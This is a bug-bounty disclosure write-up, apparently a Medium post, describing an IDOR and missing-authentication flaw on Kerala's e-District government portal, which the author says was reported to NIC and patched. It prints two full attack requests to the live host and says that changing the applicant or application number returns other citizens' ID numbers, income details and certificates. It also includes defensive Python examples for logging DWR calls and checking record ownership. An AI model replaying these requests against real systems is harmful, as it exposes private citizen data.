I Secured More Than 10 Million Users' Data on the Kerala Government Website Maintained by NIC.
Hi Hackers!! I am back again with a new vulnerability on the Kerala Government website.
For those who don't know me, search my name on Google: "Krishnadev P Melevila".
The target site was: http://edistrict.kerala.gov.in/
What is the E-District Portal?
The Kerala E-District project intends to provide Government services to citizens through Common Service Centers (CSC) which are easily accessible. Services from different departments are brought under one umbrella at any CSC. Some of the services are also made available through the online portal. It utilizes backend computerization to e-enable the delivery of services and ensures transparency and uniform application of rules. The project involves integrated and seamless delivery of services to the public by automation, integration and incorporating Business Process Re-Engineering (BPR) wherever required. In a nutshell, E-District is a tailor-made program for minimizing the effort and time needed to provide prompt and effective services to the public.
So let’s start,
Vulnerability: IDOR + IMPROPER AUTHENTICATION
Impact: CRITICAL
Risks: ATTACKER CAN VIEW/EDIT/MODIFY DATA OF OTHER USERS (VICTIMS).
Priority: P0
Scope: ATTACKER CAN DOWNLOAD OTHER USERS' CERTIFICATES AND VIEW/EDIT/MODIFY OTHER USERS' SENSITIVE DATA. COMPLETE BYPASS OF ACCESS CONTROL.
Steps to reproduce from the attacker's POV:
1. Two endpoints are vulnerable.
FIRST ONE
POST /dwr/call/plaincall/registrationDAO.getApplicantAgeGenDWR.dwr HTTP/1.1
Host: edistrict.kerala.gov.in
Cookie: <REDACTED>
Content-Length: 344
Sec-Ch-Ua: <REDACTED>
User-Agent: <REDACTED>
Content-Type: text/plain
Accept: */*
Origin: https://edistrict.kerala.gov.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
callCount=1
windowName=
c0-scriptName=registrationDAO
c0-methodName=getApplicantAgeGenDWR
c0-id=0
c0-param0=number:3735XXXX
batchId=4
instanceId=0
page=<REDACTED>
Following is the investigation on this endpoint:
❖ Cookie/session validation is not done: the endpoint answers without checking the session cookie.
❖ IDOR detected.
❖ If the attacker changes the 'c0-param0=number:3735XXXX' parameter to any other value of the same form, the attacker gets a random user's sensitive information such as national identification number, age, gender, phone, email, income details, etc.
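The request body above is a DWR "plaincall" batch: one `key=value` field per line, with each argument typed as `type:value`. The parser below is an added example (not the portal's or NIC's code) for pulling the script, method and decoded arguments out of such a body, for instance to log every `getApplicantAgeGenDWR` call together with the applicant number it asked for. The sample body, its applicant number and the `page` value are constructed for illustration; the field names follow the DWR wire format shown in the request.

```python
from urllib.parse import unquote

# Constructed DWR batch body mirroring the shape of the request above.
# The applicant number and page value are made up.
SAMPLE_BODY = """callCount=1
windowName=
c0-scriptName=registrationDAO
c0-methodName=getApplicantAgeGenDWR
c0-id=0
c0-param0=number:37350001
batchId=4
instanceId=0
page=%2FopenSearch.do
"""


def decode_param(raw: str):
    """Decode one 'type:value' DWR argument into a Python value."""
    kind, _, value = raw.partition(":")
    if kind == "number":
        return float(value) if "." in value else int(value)
    if kind == "string":
        return unquote(value)
    if kind == "boolean":
        return value == "true"
    if kind == "null":
        return None
    # Arrays/objects are passed as references to other fields; keep them raw for audit.
    return raw


def parse_dwr_batch(body: str) -> dict:
    """Return the batch id, originating page and the list of calls in a DWR body."""
    fields = {}
    for line in body.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            fields[key] = value

    calls = []
    for i in range(int(fields.get("callCount", "0"))):
        prefix = f"c{i}-"
        params = []
        j = 0
        while f"{prefix}param{j}" in fields:
            params.append(decode_param(fields[f"{prefix}param{j}"]))
            j += 1
        calls.append({
            "script": fields.get(prefix + "scriptName"),
            "method": fields.get(prefix + "methodName"),
            "params": params,
        })

    return {
        "batch_id": fields.get("batchId"),
        "page": unquote(fields.get("page", "")),
        "calls": calls,
    }


if __name__ == "__main__":
    parsed = parse_dwr_batch(SAMPLE_BODY)
    for call in parsed["calls"]:
        # An audit line like this, keyed by session, is what lets you spot one
        # session walking through many different applicant numbers.
        print(f"{call['script']}.{call['method']}({call['params']}) from {parsed['page']}")
```

Feed it the body of each `/dwr/call/plaincall/*.dwr` request and record the method plus its arguments alongside the session identifier; a single session requesting many distinct applicant numbers is the enumeration pattern this bug allows.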
SECOND ONE
POST /openSearch.do HTTP/1.1
Host: edistrict.kerala.gov.in
Cookie: <REDACTED>
JSESSIONID=8Bd+K88MaOh-XbWczEiY0g__.node1
Content-Length: 348
Cache-Control: <REDACTED>
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: <REDACTED>
Upgrade-Insecure-Requests: 1
Origin: https://edistrict.kerala.gov.in
Content-Type: application/x-www-form-urlencoded
User-Agent: <REDACTED>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <REDACTED>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
s_code=RC&updated_date=&tknName=token&token=16516737194326072874285415736384&action=&fromDateHidden=&toDateHidden=&tknName=token&token=16516737194326072874285415736384&tknName=token&login=&navigate=&txtApplicationNo=&userHidden=&receiptHidden=&searchService=qrPrint&srvceType=cert&applNo=70913065&appno=&proceedingform=&servicetype=Non-Creamy+Layer
Following is the investigation on this endpoint:
❖ The 'applNo' parameter (the application number, here 70913065) is vulnerable to IDOR.
❖ No session/cookie validation.
By exploiting this endpoint, an attacker can download other users' certificates issued by the government.
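Both endpoints share one defect: the client-supplied number is the only input to the lookup, so whoever can send the request gets the record. The model below is an added example (not the e-District portal's or NIC's code) showing that shape beside the hardened one for both the applicant-profile lookup and the certificate download: identity comes from the session, and the record is returned only if the session's user owns it or holds an explicit grant for it (the way a CSC operator acting for a citizen should be modelled). All records, session ids, user names and the grant table are constructed for illustration.

```python
# Constructed data: applicant profiles (the getApplicantAgeGenDWR data),
# issued certificates (the openSearch.do data), sessions and operator grants.
APPLICANTS = {  # applicant number -> profile
    37350001: {"owner": "citizen_a", "national_id": "ID-0001", "age": 41, "gender": "F",
               "phone": "+91-9000000001", "email": "a@example.org", "income": 120000},
    37350002: {"owner": "citizen_b", "national_id": "ID-0002", "age": 29, "gender": "M",
               "phone": "+91-9000000002", "email": "b@example.org", "income": 450000},
}
CERTIFICATES = {  # application number -> issued certificate
    70913065: {"applicant": 37350001, "service": "Non-Creamy Layer", "pdf": b"%PDF-cert-A"},
    70913066: {"applicant": 37350002, "service": "Non-Creamy Layer", "pdf": b"%PDF-cert-B"},
}
SESSIONS = {"sess-a": "citizen_a", "sess-b": "citizen_b", "sess-op": "csc_operator_1"}
# A CSC operator acts for specific citizens: an explicit grant, never a bypass.
GRANTS = {"csc_operator_1": {37350002}}


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


# --- Vulnerable shape: the number in the request is the whole authorisation decision.
def get_applicant_vulnerable(applicant_no: int) -> dict:
    return APPLICANTS[applicant_no]


def certificate_vulnerable(appl_no: int) -> bytes:
    return CERTIFICATES[appl_no]["pdf"]


# --- Hardened shape: who you are comes from the session, what you may see from the record.
def current_user(session_id: str) -> str:
    user = SESSIONS.get(session_id)
    if user is None:
        raise Unauthenticated("no valid session")
    return user


def may_access(user: str, applicant_no: int) -> bool:
    record = APPLICANTS.get(applicant_no)
    if record is None:
        return False
    return record["owner"] == user or applicant_no in GRANTS.get(user, set())


def get_applicant(session_id: str, applicant_no: int) -> dict:
    user = current_user(session_id)
    if not may_access(user, applicant_no):
        # Same answer for "no such record" and "not yours": no enumeration oracle.
        raise Forbidden("not authorised for this applicant")
    return {k: v for k, v in APPLICANTS[applicant_no].items() if k != "owner"}


def certificate(session_id: str, appl_no: int) -> bytes:
    user = current_user(session_id)
    cert = CERTIFICATES.get(appl_no)
    if cert is None or not may_access(user, cert["applicant"]):
        raise Forbidden("not authorised for this application")
    return cert["pdf"]


def probe(fn, *args) -> str:
    """Run a lookup and summarise the outcome as a short string."""
    try:
        result = fn(*args)
    except Unauthenticated:
        return "unauthenticated"
    except Forbidden:
        return "forbidden"
    return "ok:" + (result.decode() if isinstance(result, bytes) else str(result["age"]))


if __name__ == "__main__":
    # Anyone can walk the number space against the vulnerable shape...
    print(probe(get_applicant_vulnerable, 37350002))   # ok:29
    print(probe(certificate_vulnerable, 70913066))     # ok:%PDF-cert-B
    # ...while the hardened shape ties every object to the session.
    print(probe(get_applicant, "sess-a", 37350001))    # ok:41
    print(probe(get_applicant, "sess-a", 37350002))    # forbidden
    print(probe(certificate, "sess-a", 70913066))      # forbidden
    print(probe(certificate, "sess-op", 70913066))     # ok:%PDF-cert-B (explicit grant)
    print(probe(certificate, "bogus", 70913065))       # unauthenticated
```

Two design points worth keeping when porting this to a real handler: the ownership check happens after the lookup and before anything is returned, and a foreign record and a missing record produce the same response, so the endpoint cannot be used to confirm which application numbers exist.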
PROOF
That's the end of it!! So far I have reported 3 vulnerabilities in total to the National Informatics Centre, and all 3 have been patched.
My first vulnerability on NIC: https://medium.com/bugbountywriteup/exposing-millions-of-critical-data-on-kerala-civil-supplies-website-cc3a4bed5d07
My second vulnerability on NIC: https://medium.com/bugbountywriteup/api-authentication-bypass-on-national-informatics-centre-d438b3bae085
My other bug reports: https://medium.com/@krishnadevpmelevila
Don't forget to follow me on Medium and other social media. Also, please give your 50 claps for this write-up; that's my inspiration to write more!!
I need your support to write more. Buy me a coffee please: https://www.buymeacoffee.com/krishnadevpm
My Instagram handle: https://instagram.com/krishnadev_p_melevila
My Twitter handle: https://twitter.com/Krishnadev_P_M
My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/
My personal website: http://krishnadevpmelevila.com/